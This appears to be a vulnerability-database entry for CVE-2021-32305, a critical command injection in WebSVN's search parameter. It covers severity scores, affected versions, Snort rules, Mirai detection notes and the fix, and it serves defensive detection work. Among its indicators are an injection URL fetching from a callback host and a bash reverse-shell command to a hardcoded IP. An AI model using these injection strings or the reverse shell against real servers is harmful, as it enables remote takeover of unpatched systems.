cbcvebase.
CVE-2021-32305
published 2021-05-18

CVE-2021-32305: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
86.72%
99.7th percentile
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
websvnwebsvn< 2.6.12.6.1

Detection & IOCsextracted from sources · hover to see the quote

url/search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22
path/search.php?search=";
command/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|"; fast_pattern; reference:cve,2021-32305; classtype:attempted-admin; sid:2033849; rev:1; metadata:attack_target Server, created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_31, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033857; rev:3; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033856; rev:4; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • The exploit targets the `search` parameter in `/search.php`. Monitor HTTP GET requests to this endpoint containing shell metacharacters such as `";` (URL-encoded as `%22%3b` or raw `|22 3b|`) which are used to inject OS commands.
  • In-the-wild Mirai exploitation payloads use the pattern `/search.php?search=|22 3b|/bin/bash+wget+http://` followed by an IP address, then `|3b|+` within 50 bytes — as captured in ET SIDs 2033856 and 2033857.
  • Post-exploitation Mirai variant beacons outbound to C2 on TCP port 666 using a custom text-based protocol; monitor for unusual outbound TCP connections to port 666 from web servers.
  • Dropped Mirai binaries are packed with a modified UPX packer, causing standard UPX unpacking tools to fail. Static analysis or manual unpacking is required; automated tools will not successfully unpack these samples.
  • The attack drops binaries for 12 Linux architectures via a shell script (brute-force execution of all architectures). Look for mass download activity of multiple architecture-specific ELF binaries from a single web server process shortly after a WebSVN search request.
  • Palo Alto Networks Threat Prevention Signature 91280 blocks exploitation of CVE-2021-32305; ensure this signature is active on perimeter NGFWs.
  • ·The vulnerable code path is in `include/svnlook.php` (function `getListSearch`) and `include/command.php` (function `runCommand`). The fix applies `escapeshellarg` to the search input before shell concatenation. Verify patched deployments actually contain this fix, as the vulnerable parameter is user-controlled with no authentication required.
  • ·The exploit proof-of-concept uses a reverse shell payload targeting a hardcoded attacker IP (192.168.1.149:4444); real-world attacks substitute this with attacker-controlled infrastructure. Do not treat this IP as a production IOC.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.